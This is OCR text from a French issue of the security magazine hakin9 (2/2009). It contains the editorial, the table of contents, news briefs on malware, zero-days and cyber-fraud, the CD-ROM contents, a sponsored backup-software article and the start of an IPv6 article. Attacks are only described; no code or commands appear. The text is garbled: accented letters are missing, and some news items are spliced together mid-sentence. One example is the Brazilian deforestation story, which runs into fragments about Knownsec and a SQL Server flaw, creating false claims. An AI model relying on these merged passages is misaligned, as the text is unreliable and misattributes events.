01_okladka_h9_FR.

indd

2009-01-09, 12:41

02_rekl_elegia.indd

2009-01-08, 15:54

DITORIAL
CHERS LECTEURS,
ous tenez dans les mains le deuxime numro de hakin9 de cette anne. Quelles nouveauts allez vous retrouver dedans ? Comme toujours nous vous invitons plonger dans le monde de la scurit informatique en mettant sous la loupe entre autres des attaques sur les rseaux (attention vos firewalls !), les failles dans WiFi (qui n'est pas concern ? tout le monde prtend les connatre et pourtant le monde veut en savoir plus ...), les moyens de sauvegarder des donnes fragiles, la scurisation de codes sources pour les programmeurs, et d'autres informations utiles. Cela fait dj six mois que nous avons publi l'dition spciale consacre la technologie Cisco. Les rsultats ont largement dpass nos attentes, nous recevons encore des questions de votre part demandant comment retrouver cette dition. Nous sommes particulirement fiers de ce projet et nous vous remercions de votre intert pour ce guide. Pour tous ceux qui n'ont pas eu l'occasion de l'obtenir, nous avons deux bonnes nouvelles. Premirement, nous avons dcid de vous fournir dans chaque numro de hakin9 des matriaux traitant de cette thmatique, adapts spcialement pour tous ceux qui veulent apprendre et travailler quotidiennement sur les solutions Cisco. Dans ce numro nous vous invitons dcouvrir tous les dtails du protocole IPv6, le savoir indispensable pour chaque administrateur. Pensez vous l'avoir matris ? Consultez notre dossier, nous vous garantissons que vous y trouverez des astuces pratiques et surprenantes. Deuxime bonne nouvelle, nous sommes dj en train de prparer la nouvelle dition spciale hors srie de hakin9 starter kit ! Bah oui, et cette fois aussi il sera consacr aux rseaux informatiques en s'adressant principalement ceux qui cherchent des bases solides et exhaustives savoir. Regardez attentivement les magazines dans votre kiosque ... ou bien visitez rgulirement notre site pour tre au courant sur cette publication. Et tant qu'on y est, avez-vous dj visit notre forum ? Nous vous invitons rejoindre la communaut de nos membres. Profitez des expriences d'autres utilisateurs et faites nous savoir vos opinions sur hakin9 ! Nous les attendons avec impatience. Voila, il nous reste plus qu' vous inviter la lecture ...

Bonne apprentisage, Rdaction hakin9

1/2009 HAKIN9

03_wstepniak.indd

2009-01-09, 15:35

SOMMAIRE
DOSSIER
14 Le protocole IPv6
FRDRIC ROUDAUT Le nombre d'adresses attribues actuellement est proche des limites du protocole Ipv4. Pour cette raison le nouveau mode d'adressage est couramment mis en place . Il ne s'agit pas d'une simple extension d'IPv4, mais d'un protocole part entire, solution standardise pour tous les administrateurs rseux dans un futur trs proche. Cet article vous explique en dtails toutes les techniques fondamentales d'IPv6 du ct pratique.

36

Le cryptage des communications sur le rseau

IGNACE KAGNI KUEVIAKO Toute personne se retrouve mal l'aise si elle se sait espionne ou surveille par un individu malintentionn. Grce cet article vous allez suivre quelques possibilits d'interception et de lecture des paquets envoys sur le rseau. Ensuite vous apprendrez la mise en place d'un systme de cryptage efficace pour s'en protger.

TECHNIQUE
44 Nouvele faiblesse dans la technologie WiFi
LAURENT LEVIER Nous avons souvent parl des faiblesses les plus populaires de la technologie WiFi, y compris les failles du protocole WEP, mais est-ce qu'on est au courant de tout se qui se cache derrire le protocole WPA ? WPA est n suite aux carences dans la conception du protocole prcdent, mais comme vous le verrez, de nouvelles mthodes d'attaque sont dj prsents sous la main...

PRATIQUE
28 Tunneling HTTP une mthode simple pour contourner les firewalls
MICHAEL SCHRATT Tandis que les administrateurs font de leur mieux pour scuriser les attaques potentielles sur le rseau, il existe des utilisateurs qui tentent de compromettre le primtre de scurit. Michael Schratt vous montre comment utiliser les techniques de Canaux Cachs en cachant ses traces grce au Tunneling HTTP. Il est important de connatre les secrets des intrusions, mais faites attention de ne pas utiliser les techniques prsentes des fins illgales !

48

Ofuscation Javascript partie 2

DAVIR MACIEJAK L'auteur continue de vous fournir des astuces permettant de comprendre les scripts malicieux. Comme ce vecteur d'attaques devient de plus en plus important, il y a de grands risques que vous soyez un jour face l'un d'eux. Suite la lecture de cette partie vous apprendrez identifier diffrentes types d'attaques, ainsi qu'analyser un shellcode.

HAKIN9

04_05_SPIS_TRESCI___FR.indd

2009-01-05, 18:00

SOMMAIRE
FOCUS
60 Approche de la virtualisation des postes de travail
GRGORY CARLET La virtualisation dispose de deux intrts majeurs: la facilit d'utilisation, ainsi que la concentration des postes de travail diffrents en un seul, ainsi que la mobilit. Mais cela ne se fait pas sans heurt et peut rapidement se faire au dtriment des performances et de la scurit des donnes transfres. L'auteur vous montre non seulement la mise en uvre d'une solution de virtualisation en pratique, mais aussi les enjeux de scurit que chacune des mthodes peut entraner.

POUR LES DBUTANTS

76 USB dumping
NICOLAS RENARD Le standard U3 permet de stocker sur des cls USB des applications autonomes qui s'excutent automatiquement lorsque celles-ci sont connectes un ordinateur. Certains lanceurs malveillants permettent d'excuter directement des actions l'insertion de la cl, et sont fournis avec des outils permettant de rcuprer les tables de mots de passe, d'installer une capture de clavier ou un rootkit .. . Voudriez vous en savoir plus ? Nous vous invitons la lecture !

66

Certifications ISO 27001 pour les individus

HERV SCHAUER En France plus de 500 personnes ont une certification personnelle sur l'ISO 27001. Qu'est-ce qui les a men vers un tel investissement ? Herv Schauer vous explique les atouts du certificat pour un informaticien particulier, ensuite il vous prsente des conseils sur comment reussir sa certification et comment la mettre en valeur, une fois obtenue ...

DATA RECOVERY
70 Politique de gestion des donnes
DIDIER SICCHIA Cet article se propose d'examiner la mthode rflchie d'un grand groupe afin d'offrir aux entreprises une migration, un transfert ou une destruction de donnes efficace. Disposant de cette exprience supplmentaire, les particuliers auront ainsi plus de facilit percevoir les avantages et les inconvnients de certaines alternatives.

VARIA
06 En bref
Vous trouverez ici les nouvelles du monde de la scurit des systmes informatiques. Prpare par Christophe Ledorze Instructeur Linux Novell

10

Sur le CD-ROM

Nous vous prsentons le contenu et le mode de fonctionnement de la version rcente de notre principale distribution hakin9 avec le cours vido et les divers outils.

80 82

Interview

Nous vous invitons la lecture d'entretien avec Herv Schauer, l'expert du monde de la scurit informatique.

Dans le prochain numro

Quelques mots sur les articles qui paratront dans le numro 3/2009(37)

HAKIN9

04_05_SPIS_TRESCI___FR.indd

2009-01-09, 14:00

EN BREF
QUOTAOFF SUR /FORET_ AMAZONIENE
Dans la plupart des rgions du Brsil, toutes les entreprises lies l'industrie du bois provenant de la fort amazoniene sont soumises des quotas par zones pour contrler la dforestation galopante. Ces quotas tant fixs de manire informatique , il aura fallu peu de temps des esprits peu scrupuleux pour embaucher des pirates et bien plus aux autorits ainsi qu' Greenpeace pour comprendre l'tendue des dgts commis par ces mercenaires : 1,7 millions de mtres cubes, soit l'quivalent du volume de 780 piscines olympiques, vols la fort, tel est le chef d'accusation pesant sur 202 personnes selon Greenpeace. Celui-ci s'est d'ailleurs maladroitement chapp du laboratoire de ceux qui l'ont dcouvert , le groupe chinois Knownsec. La dernire des failles ,date du 11 dcembre, touche quant elle le serveur SQL de la marque , elle offre la possibilit aux habitus des SQL injection de jouer sur l'initialisation de variables par la procdure sp _ replwritetovarbin afin de pouvoir rcrire sur les zones mmoires en jeu. de logiciels sans le consentement des utilisateurs, la socit Cyberspy base en Floride a finalement vu son jugement modifi et peut depuis peu continuer de commercialiser ce logiciel jug douteux par beaucoup. La justice californienne a donc donn un aval conditionn cette recommercialisation. En effet la justice avait revu d'un bon oeil la possibilit de gestion parentale parentale et avait pris une position plus conciliante. Mais dornavant la socit devra clairement dire ses clients qu'ils ne peuvent prendre le contrle de postes sans en informer les utilisateurs et qu'elle devra revoir certains des fonctionnements de son Remotespy, comme le fait de ne fonctionner qu'en mode "cach" et qu'aucun menu, ou fentre n'en permet pas la dsinstallation.

AVG NE RECONNAIT PLUS LES SIENS

Durant les dernires semaines, aprs avoir injustement identifi cinq composants de Zone Alarm de Checkpoint comme tant les marques d'un cheval de Troie, AVG avait rcidiv en classifiant cette fois le fichier user32.dll comme susceptible de contenir un cheval de Troie, or dans ce cas AVG prconnisait la suppression du fichier ce qui avait pour effet de compromettre un dmarrage correct de l'OS. Cette fois ci c'est au tour d'Adobe Flash de se faire traiter de malware. Et mme si cette fois une solution a t trouve dans les trois heures, l'diteur a tenu s'expliquer quand aux rcurents faux positifs, et avoue qu'il s'agit l du talon dAchille des solutions antivirales modernes. AVG souhaitant calmer les vrais ngatifs pointant du doigt les dommages occasiones, a annonc que les utilisateurs de la version 7.5 et 8 impacts recevront une licence d'un an ou une extension gratuitement.

SPAM PERDEZ 873 MILLIONS DE DOLLARS POUR TRE MINCE AVANT LES FTES
C'est la somme record statue par la cour amricaine, que devra verser la socit Atlantis Blue Capital aux dirigeants du social network le plus utilis, Facebook. En effet le verdict du procs qui a dbut au mois de mars a t prononc fin novembre. La socit en question, derrire laquelle se cache un canadien du nom de Adam Guerbuez, avait vol plusieurs comptes Facebook et les avait utiliss pour envoyer pas loin de 4 millions de mails aux couleurs du Viagra et de la marijuana la pyramide de contacts sur laquelle est fonde Facebook. Il y a fort a parier que les 628 millions d'euros que cela reprsente ne seront jamais verss, mais selon Max kelly, le responsable de la scurit du site communautaire, il s'agit l d'une grande victoire pour le site et ses usagers. Facebook s'attend-il recevoir rapidement les 873 millions de dollars et les partager d'une manire quelconque avec ses usagers ? Hlas, non. Il est invraisemblable que Guerbuez et Atlantis Blue Capital puissent un jour honorer le jugement rendu. Mais nous sommes confiants sur le fait que cette condamnation reprsente une forte

TROIS ZERO-DAYS SOUS LE SAPIN

Le mois de dcembre est des plus sombres pour Microsoft, en effet en quelques jours pas moins de trois failles zero-day sont apparues. La premire porte sur le Wordpad converter et permet a celui qui cre un fichier Word bien prpar destination de sa victime d'obtenir les droits de celle-ci alors qu'elle souhaitera l'diter avec Wordpad. La seconde affecte IE7 et les 26% des utilisateurs qui lanceront eux-mme la charge qui leur sera fatale au hasard d'un site hbergeant l'exploit issu du parser XML.
6 HAKIN9 2/2009

SOURIEZ, VOUS TRS SOUS LE CONTRLE DE REMOTEPSY

Aprs lui avoir initialement interdit de vendre son produit phare pour avoir bafou les lois relatives l'installation

06_07_08_09_enBref.indd

2009-01-05, 18:01

EN BREF
dissuasion pour quiconque chercherai abuser Facebook et ses utilisateurs. Alexandre Gostev, Expert Anti-Virus Senior de Kaspersky Lab. Dbut 2008, nous prvoyions une hausse des cyber-criminels exploitant MySpace, Facebook et des sites du mme type et nous en avons la confirmation aujourd'hui. Je suis certain qu'il s'agit d'une premire tape et que les auteurs de virus vont continuer dans cette voie avec une intensit accrue. Une chose est sre la dcouverte de faille ou les virus d'un systme sont proportionnels sa popularit et nul n'ignore que Mac est de plus en plus reprsent, alors que faire, prvenir ou gurir ?

COMMENT RGIR LE CYBERESPACE ?

Le rapport rendu par un groupe d'experts amricains du CSIS (Centre d'tudes stratgiques et internationales) sur l'existant en matire de scurit informatique au sein des administrations amricaines est accablant. Et bien que le 44e prsident fasse figure de technophile, aficionado de Blackberry et de Youtube, il va devoir solutionner un problme que Georges W Bush a avou ne pas avoir prpar durant son mandat : La cyberguerre. En effet ce rapport long de 96 pages est des plus alarmant et impose la cration trs prochaine d'un Bureau national du Cyberespace. Inutile de rappeler que la vitrine de la puissance amricaine fait figure de cible privilgie pour les pirates et ce bien avant les diffusions de Wargames et qu'il est admis que ces pirates soient par la suite embauchs pour apporter leur savoir... Et pourtant que ce soit du domaine de la scurit intrieure, de celui de la recherche, ou encore des diffrents ministres, la conclusion la Cyberattaque des services internes de mars (Cyberstorm II) est la suivante : tous les secteurs sont vulnrables. Le premier point traiter serait celui de la lgislation, il semble vident que tous les textes rgissant les agissements dans le cyberespace doivent tres entirement rcrits pour coller la problmatique. Comment faire valoir les droits informatiques l'chelle mondiale ?

HEY ON T'A FILM EN TRAIN DE DANSER, REGARDE TA TTE T'ES TOUT ROUGE, IL FAUT QUE TU VOIS A !
Voil ce que vous pourriez recevoir de la part d'un ami infect par Koobface le ver communautaire svissant sur Facebook et Myspace. Koobface utilise la force du systme de messagerie communautaire pour infecter des utilisateurs et ainsi obtenir bon nombre de donnes confidentielles, professionnelles, bancaires etc. Il se propage simplement en envoyant des messages aux titres accrocheurs aux contacts des utilisateurs infects du type Paris Hilton lance un nain dans la rue, Regarde on t'a film nu !!! LOL.... Les messages laisss incluent des liens vers youtube.pl. Lorsque l'utilisateur clique sur ce lien, il est alors redirig vers http://youtube.ru, o l'attend un clip vido. Si l'utilisateur choisi alors de le regarder, un message apparait lui demandant d'installer la dernire version de Flash Player pour pouvoir regarder le clip. Mais lorsque celui-i clique sur le lien au lieu de tlcharger la dernire version de Flash Player, un fichier du nom de codesetup.exe est rapatri sur l'ordinateur de la victime et est alors prt logger les informations et forcer ses contacts le faire leur tour. Malheureusement, les utilisateurs font confiance aux messages laisss par des amis sur les sites de rseaux sociaux. Aussi la probabilit que l'utilisateur aille cliquer sur ces liens est trs forte, dduit

UN VER DANS LA POMME ? NON MAIS SOYEZ PRVOYANTS

News trs intressante pour qui suit l'volution de la politique de scurit d'Apple. Durant un court moment, la marque avait en effet officielement recommand ses utilisateurs l'installation d'un antivirus. Elle poussait aussi l'achat de plusieurs logiciels complmentaires, relatifs la scurit. Apple recommande l'utilisation d'antivirus afin que les concepteurs de virus aient plus qu'une seule application contourner, rendant ainsi l'criture de virus plus difficile. Mais cette note trs vite remarque par le Washington Post devait disparaitre rapidement et laisser Bill Evans, un porte parole, s'exprimer ce sujet. Nous avons retir la note de la base des connaissances puisqu'elle tait vieille et fausse. Le Mac intgre des technologies le protgeant nativement de ce genre de menaces de scurit. Mais ceux qui en concluent juste titre pouvoir se passer de toutes solutions de scurit Bill Evans rtorque : Compte tenu du fait qu'aucun OS ne puissent tre impermable toute attaque, utiliser un antivirus peut tre une protection supplmentaire.

2/2009 HAKIN9

06_07_08_09_enBref.indd

2009-01-05, 18:01

EN BREF
UN PUR SANG RUSSE
Trois hommes ont ts inculps pour fraude aux tats unis, selon les accusations ils auraient utilis des chevaux de Troie faits maison afin de piller des banques en ligne et de dtourner des comptes de courtage. Alexander Bobnev, de Volgograd en Russie, aurait t le leader de cette escroquerie et il aurait collabor avec Aleksey Volynskiy, de Manhattan et Alexey Mineev de Hampton, New Hampshire, tous deux naturaliss amricains, qui aurait t les mains lgales de Bobnev sur le territoire amricain, ce sont eux qui craient les comptes et effectuaient les transferts sur lesquels un pourcentage tait transmis en Russie. L'arnaque a dur environ 15 mois, jusqu'au mois de dcembre 2007. Mais partir du mois de juin de l'anne dernire, la police a russi, l'aide d'un informateur placer sous contrle fdral les comptes incrimins et tracer des paiements de 15,400$ et 4,700$ depuis deux comptes compromis, ce qui fut suffisant pour stopper la fraude et recueillir les preuves suffisantes pour une arrestation. Chacun des hommes est poursuivi pour fraude, pour faux et usage de faux, avec circonstances aggravantes pour Volynskiy qui avait cr la fausse carte de crdit. ( paypal.com, bankofamerica.com, halifaxonline.co.uk, wachovia.com, chase.com...). Les identifiants ainsi que les mots de passes associs sont envoys une adresse base en Russie. les coupables. Provisoirement, les clients ne savent plus consulter leurs comptes par le biais d'internet. Ceux qui ont des virements urgents effectuer, sont pris de s'adresser l'agence du Crdit Agricole la plus proche, a dclar le CEO, Luc Versele.

LINSIA : LEXPRIENCE EN PLUS !

Linsia : lexprience en plus, les frais de scolarit en moins ! tel est le slogan de lINSIA qui, depuis 10 ans, forme des ingnieurs informatiques en alternance. Gnie Logiciel, Systmes et Rseaux ou Temps Rel et Systmes Embarqus, aprs une anne de tronc commun, les lves choisissent lune de ces spcialisations. Admis aprs un bac+2 ou bac+3 informatique , les candidats intgrent une entreprise dans laquelle ils seront stagiaire 3 jours par semaine, les 2 jours restants sont consacrs aux cours et ce, durant tout le cycle. Les tudiants sont invits changer dentreprise chaque anne, afin de diversifier leurs expriences et leur connaissance du milieu professionnel. Lalternance permet aussi des jeunes de suivre des tudes quils nauraient pas pu se payer puisque les 2/3 des frais sont pris en charge par lentreprise. Attention, le niveau des cours est lev et suivre une formation alterne demande motivation et travail individuel soutenu ! Mais ces efforts sont rcompenss : La force de lINSIA cest quavant mme davoir leur diplme, les tudiants signent dj un contrat, en gnral en CDI. Lcole est partenaire de beaucoup dentreprises et en ce moment le secteur recrute bien, donc les tudiants nont aucun mal trouver un emploi ... bien au contraire, les employeurs viennent les solliciter ds le mois de mars de leur dernire anne ! Plus dinformation sur www.insia.org

BELGIQUE : DEUX BRAQUAGES EN LIGNES EN UNE SEMAINE

En une semaine deux banques belges se sont faites attaquer. La premire, reste anonyme que peu de temps, Dexia a vu une dizaine de ses comptes clients tre simplement vids. Selon les experts il semblerait qu'un virus dormait paisiblement sur le site de la banque et qu' chaque fois qu'un usager prenait le temps de procder un test de scurit de la plateforme en cliquant l o on le lui suggrait, il tlchargait simplement le code viral qui, une fois lanc, ordonnait des transactions et des transferts cachs. La seconde banque n'est autre que le Crdit Agricole, dont le site web a bnfici gratuitement d'une petite mise jour. Aux environs de 9h30, le Crdit Agricole a constat qu'un pirate avait adapt la page d'accueil de "Crelan Online", le site d'internet banking. Un champ supplmentaire y avait t apport, afin de se procurer des donnes personnelles de clients. Jusqu' prsent, quatre clients ont signal avoir subi des dommages, a expliqu la banque dans un communiqu. La computer crime unit de la police fdrale (eCops) a t prvenue et collabore avec la banque pour trouver

DES PLUGINS POUR FIREFOX RICHES EN NOUVELLES FONCTIONNALITS

Bitdefender a annonc la dcouverte d'un nouveau genre de dtournement des mots de passes et d'autres informations circulant sur la machine. En effet Chromeinject est plac sur la machine victime par un autre malware qui ira jusqu' dposer sa charge dans le rpertoire de plugins de Firefox, lui permettant ainsi de se lancer par la suite chacun des dmarrages de Mozilla Firefox. Mais que fait donc ce malware ? Il filtre de manire systmatique les donnes envoyes par l'utilisateur vers une centaine de sites internet bancaires.
8 HAKIN9 2/2009

06_07_08_09_enBref.indd

2009-01-05, 20:11

EN BREF

2/2009 HAKIN9

06_07_08_09_enBref.indd

2009-01-05, 18:01

HAKIN9.LIVE
CD-ROM HAKIN9.LIVE
Le magazine hakin9 est toujours accompagn d'un CD-ROM. Vous y trouverez en exclusivit un cours vido et un ensemble doutils particulirement utiles pour scuriser ses donnes.

omme toujours cette dition du magazine hakin9 est propose avec hakin9.live, CD bootable avec la distribution BackTrack3. BackTrack3 est la distribution Linux live la plus pertinente dans le registre de la scurit informatique. Sans aucune installation pralable, la plate-forme d'analyse peut tre directement dmarre partir du CD-Rom et son contenu entirement accessible en quelques minutes seulement. Outre les mises jour et d'autres optimisations, cette version de BackTrack3 hakin9.live contient galement des ditions spciales d'applications commerciales parmi les plus intressantes du moment. Elles sont prpares exclusivement l'attention toute particulire de nos lecteurs. Pour pouvoir utiliser BackTrack3 hakin9.live, il vous suffit de dmarrer votre ordinateur partir du CD. Pour pouvoir utiliser les applications commerciales fournies, inutile de dmarrer votre ordinateur partir du CD : vous les trouverez dans le dossier Applications. Chaque paquet, configuration de noyau et script contenu dans BackTrack3 est optimis de manire tre utilis par les experts en audits de scurit et de tests d'intrusion. Les patchs de correction et autres scripts automatiques ont t ajouts, appliqus ou dvelopps de manire proposer un environnement agrable, intuitif et prt l'emploi.

configuration ASP Web.Config, ralis par Assyad Hamza. Objectif du tutoriel est d'expliquer une mthode de scan utilise par les personnes malveillantes afin d'identifier les serveurs Web IIS ayant des failles de scurit, au niveau de la gestion des

droits d'accs, de lecture et d'criture. Il prsente diffrents moyens de collecter des informations sur un serveur: identifiants serveur mail, SQLServer, Mysql, et galement les accs administrateur.

COURS VIDO
Nous vous invitons consulter le cours vido : Vulnrabilits du fichier de
10 HAKIN9 2/2009

10_11_12_Opis_CD.indd

10

2009-01-05, 18:02

HAKIN9.LIVE

Sil vous est impossible de lire le CD. et que ce dernier nest pas endommag physiquement, essayez de lire dans au moins 2 lecteurs diffrents.

En cas de problme avec votre CD, envoyez-nous un message ladresse suivante : cd@hakin9.org

2/2009 HAKIN9

1 1

10_11_12_Opis_CD.indd

11

2009-01-05, 18:02

HAKIN9.LIVE
PASSWARE ENCRYPTION ANALYZER PROFESSIONAL
Ce programme permet de rechercher et rcuprer l'ensemble des mots de passe protgs ou crypts sur un ordinateur ou sur un rseau. Il arrive frquemment que des employs quittent l'entreprise sans donner le dtail prcis de leurs mots de passe et fichiers protgs. Encryption Analyzer Professional rsoud ce problme en un temps record une analyse de tout le systme prend moins d'une heure et les administrateurs obtiennent ensuite un rapport complet sur ces fichiers protgs. Encryption Analyzer Professional peut analyser des systmes au sein d'un rseau, effectuer des analyses planifies l'avance et supporter le mode batch. Passware Encryption Analyzer est galement disponible sous la forme d'un SDK http://www.lostpassword.com/ encryption-analyzer-sdk.htm pour la plateforme .NET, les dveloppeurs pourront ainsi exploiter l'ensemble des fonctionnalits d'Encryption Analyzer dans leurs applications sans crire une ligne de code. http://www.lostpassword.com/encryptionanalyzer.htm Prix : 295USD une dtection optimale tout en rduisant le risque de faux-positifs. Une protection en temps rel protge votre systme des menaces 24 heures sur 24 et le scan l'excution permet d'viter l'excution de programmes malicieux sur votre ordinateur. http://www.systweak.com/Products.asp Prix : 29,95USD

NTFS FOR LINUX

Combinez l'incompatible et obtenez l'accs transparent vers des volumes NTFS sous le systme d'exploitation Linux. Ce logiciel vous permet de lire, modifier, copier et crer de nouveaux fichiers et dossiers. Version limite, disponible uniquement en anglais. http://www.paragon-software.com/fr

SPB BACKUP 2.0 RCUPERATION DE DONNES SUR VOTRE MOBILE

Spb Backup est un logiciel de sauvegarde et de rcuperation de donnes sur Windows Mobile. Il est galement utilis par les logiciels de migration qui sauvegardent l'ensemble des donnes (cela inclut tous les fichiers de configuration, programmes, mises jou et bases de donnes) avant de les transfrer sur des pripheriques jour du type matriel ou ROM. Il y a toujours des personnes qui perdent ou cassent leurs tlphones portables. Le but de Spb Backup 2.0 est de rmedier aux problmes de transfre, perte de donnes, sauvegarde des prfrences et configurations entre tlphones Windows Mobile. Il sauvegarde non seulement vos contacts, messages texte, courriels et fichiers de sauvegarde, mais galement vos prfrences et les raccourcis ! Ds maintenant la version complte de Spb Backup 2.0 est offerte avec la remise de 30%, exclusivement pour les lecteurs de hakin9. Sur le CD vous trouverez le code promotionnel pour profiter de la rduction spciale. http://www.spbsoftwarehouse.com

PC TOOLS ANTIVIRUS 5 POUR WINDOWS

PC Tools AntiVirus analysera l'ordinateur en profondeur et saura le protger des attaques virales. Grce PC Tools AntiVirus vous serez protg contre les cyber-menaces les plus dangereuses qui tentent d'accder votre ordinateur et aux informations personnelles qu'il contient. Aller sur Internet sans protection contre les dernires espces de virus et vers particulirement virulents et se propageant vite tels que Netsky, Mytob et MyDoom peut entraner l'infection de l'ordinateur en quelques minutes. http://www.pctools.com/fr/antivirus/ Prix : 29,95EUR

SPYWARE DOCTOR ADVANCED SYSTEM PROTECTOR

Advanced System Protector est une solution logicielle capable de dtecter et supprimer les programmes malicieux : spywares, adwares, malwares, exploits, keyloggers, BHO, vers et toutes les autres menaces lies Internet, susceptibles d'endommager votre ordinateur. Le moteur d'analyse avance (advanced scan) et la mise jour quotidienne des signatures assure
12 HAKIN9 2/2009

Le but de ce logiciel est de scuriser votre PC face aux menaces la vie prive et au tracking. Spyware Doctor est un utilitaire de premier ordre destin supprimer les malwares et les spywares. Il les supprime de votre PC et le protge des milliers de spywares, adwares, chevaux de Troie, enregistreurs de frappe, spybots et menaces de tracking. http://www.pctools.com/fr/consumer/ products/ Prix : 29,95EUR

MATRIAUX COMPLMENTAIRES
En supplment d'article Le protocole Ipv6 nous avons mis sur le CD les illustartions et captures d'cran qui vous aideront suivre le techniques dcrites dans l'article. Vous les trouverez dans le dossier articleIPv6. Bonne apprentissage !

10_11_12_Opis_CD.indd

12

2009-01-05, 18:02

SPB BACKUP 2.0

ans cet article nous verrons en dtails les fonctionnalits et les avantages de Spb Backup 2.0. Vous prendrez connaissance non seulement des possibilits offertes par ce produit, mais galement ce qui le rend comptitif sur le march et ses principales caractristiques qui donnent de nouvelles possibilits aux utilisateurs grce un environnement accessible et bien pens.

Origine

Spb Backup 1.0 est sorti en 2006 et a connu un grand succs. lorigine, Spb Backup a fait son apparition grce a la technologie Spb Clone un produit, reconnu par des milliers dentreprises permettant de crer des copies exactes de son PDA. La simplicit de linterface utilisateur, la fiabilit et la facilit avec laquelle il restaure les donnes ont fait quen 2007 Spb Backup a figur parmi les meilleures ventes doutils de sauvegarde sur Pocket PC. Spb Backup est vite devenu un utilitaire de sauvegarde incontournable pour un grand nombre dODM, il tait livr avec des priphriques ASUS et Gigabyt. Aujourdhui, Spb lance sur le march Spb Backup 2.0, qui est la fois plus rapide, plus efficace et possdant une interface utilisateur amliore et innovante.

Philosophie du produit
Spb Backup entre dans la catgorie des logiciels de sauvegarde et de rcupration de donnes sur Windows Mobile. Il est galement utilis par les logiciels de migration qui sauvegardent lensemble des donnes (cela inclut tous les fichiers de configuration, programmes, mises a jour et bases de donnes) avant de les transfrer sur des priphriques jour de type matriel ou ROM. Spb Backup 2.0 a t conu avant tout pour tre accessible nimporte quel utilisateur Windows Mobile. Plus on avance et plus il y a une multitude de nouveaux appareils commercialiss. Cependant, certaines choses qui ne changeront jamais, par exemple les personnes qui perdent ou cassent leurs tlphones portables. Le but de Spb Backup 2.0 est de remdier aux problmes de transfert, perte de donnes, sauvegarde des prfrences et configurations entre tlphones Windows Mobile cest aussi simple que de dcompresser un fichier archiv. Spb Backup 2.0 marche la fois sur Pocket PC et Smartphone, il transfrera les archives sauvegardes vers un emplacement scuris sur PC via lassistant de synchronisation de Spb Backup. Spb Backup sauvegarde non seulement vos contacts, messages texte (sms), courriels et fichiers de sauvegarde, mais galement vos prfrences et les raccourcis. Il clone si bien les configurations dun tlphone Windows Mobile quil est difficile de se rendre compte quil y a eu une restauration, except lheure quil faut rgler soi-mme.

Voici divers cas envisageables : Le portable a t perdu ou vol. Malheureusement il y a encore beaucoup de personnes qui perdent ou se font voler leur portable. La simple perte dun tlphone portable peut entraner la perte de ses contacts ou de ses messages texte. Avec les tlphones Windows Mobile ce problme peut tre encore plus ardu. Les utilisateurs conservent non seulement des donnes tels que : leurs contacts, tches effectuer, rendez-vous, mais galement des infos GPS et des tonnes de logiciels. Dans ce cas meme des sauvegardes appropries sur carte mmoire ne sont daucune aide, en effet lorsque le portable est perdu, la carte mmoire lest galement. Spb Backup 2.0 comporte une nouvelle fonctionnalit qui permet de copier automatiquement les fichiers sauvegardes vers le bureau ce qui permet au moins de retrouver ses donnes selon les situations. Les donnes peuvent tre consultes et exportes grce un outil spcifique (dcompresser), ou restaures sur un autre portable. Le portable a eu des problems logiciels, vous avez du faire une rinitialisation. En 2005, Microsoft lana Windows Mobile 5. Le monde du tlphone portable avait plein despoir avec les solutions de stockage de type flash qui pouvait etre une solution aux pertes de donnes qui taient frquentes avec les premiers systmes dexploitation. La communaut du tlphone portable esprait que la sauvegarde des donnes ne soit plus indispensable. Microsoft supprima loption de sauvegarde dActiveSync sur les versions Windows Mobile 5 et suprieures. Toutefois, les rinitialisations (hard reset ) taient toujours la mode, les gens continuaient perdre leurs donnes et devaient faire rgulierment des sauvegardes. Spb Backup tait de loin lunique utilitaire de sauvegarde sur Windows Mobile 5. Autre aspect, certaines applications peuvent prsenter des dfauts ou bien sont incompatibles lorsquelles sont installes ensemble, cela rend lenvironnement de travail instable voire dfaillant. Ce problme est frquent depuis la version 1.0 de Spb Backup.

p u b l i c i t

Mise jour ROM et migration du portable

Au fur et mesure, la plateforme a connue des amliorations. On a pu voir la sortie de Windows Mobile 6 et Windows Mobile 6.1, et malgr cela on sattend toujours des amliorations plus radicales. Les OEM font des merveilles et lancent des portables de plus en plus sophistiqus. Actuellement, les utilisateurs Windows Mobile du monde entier sont confronts non seulement aux problmes de pertes de donnes, mais galement de mises jour et relatifs aux ROM. La dernire version de Spb Backup rpond aux attentes des utilisateurs, il sauvegarde non seulement les contacts, les messages textes, courriels et autres tches, mais il permet galement de changer de ROM ou de portable, sans pertes de donnes. Pour plus dinformations sur ce produit : http://www.spbsoftwarehouse.com
6/2008 HAKIN9 13

Cas dutilisation
Pourquoi et quand un utilisateur doit sauvegarder les donnes de son portable? Quelles sont les possibilits de loutil de sauvegarde ?

13__sponsorowany_FR.indd

13

2009-01-05, 18:02

DOSSIER
FRDRIC ROUDAUT

Le protocole IPv6
Degr de difficult

Le nombre dadresses attribues actuellement est proche des limites du protocole IPv4 utilis pour la communication Internet. Comme le montrent diverses tudes : on assistera une pnurie dadresses lhorizon 2011. Le protocole IPv6 est la solution standardise pour palier ce manque dadresses.
epuis les annes 80, lInternet connat un succs incroyable. La majeure partie des entreprises y est maintenant directement connecte, le nombre de particuliers dtenteur dun abonnement Internet auprs dun FAI (Fournisseur dAccs Internet) est en constante croissance. La demande est telle que le nombre dadresses attribues actuellement est proche des limites du protocole IPv4 utilis pour la communication Internet. Les tudes ralises par les autorits responsables de lallocation dadresses ainsi que la commission europenne convergent : on assistera une pnurie dadresses lhorizon 2011. Il tait donc ncessaire dtendre le plan dadressage. Le protocole IPv6 est la solution standardise pour palier ce manque dadresses. La dfinition de ce nouveau protocole IPv6 a t galement une opportunit de corriger certains problmes inhrents au protocole IPv4. Ces problmes avaient t mis en exergue par la communaut Rseau au cours des dernires annes. De nouveaux besoins tels que la scurit, la mobilit, une facilitation des mcanismes de configuration sont galement apparus et ont pu tre pris en compte lors de la standardisation dIPv6. Ces diffrentes modifications font dIPv6 un protocole part entire et non une simple extension dIPv4. Il sagissait donc dadapter ces corrections sur lensemble des protocoles du modle en couche TCP/IP expliquant ainsi le travail relativement complexe et colossal effectu

par lorganisme de standardisation de lInternet, IETF (Internet Engineering Task Force) ces dix dernires annes principalement (mme si les spcifications initiales dIPv6 datent de 1988). dfaut d'espace, toutes les Figures parues dans l'article sont disponibles sur le CD joint au magazine (dossier : articleIPv6).

Adressage IPv6 et nommage

Lvolution la plus visible dIPv6 concerne lextension de son espace dadressage pour palier la pnurie dadresse du protocole actuel IPv4. Ce paragraphe vous expliquera le format de ces nouvelles adresses ainsi que le nouveau dcoupage en classes usit par IPv6.

CET ARTICLE EXPLIQUE...

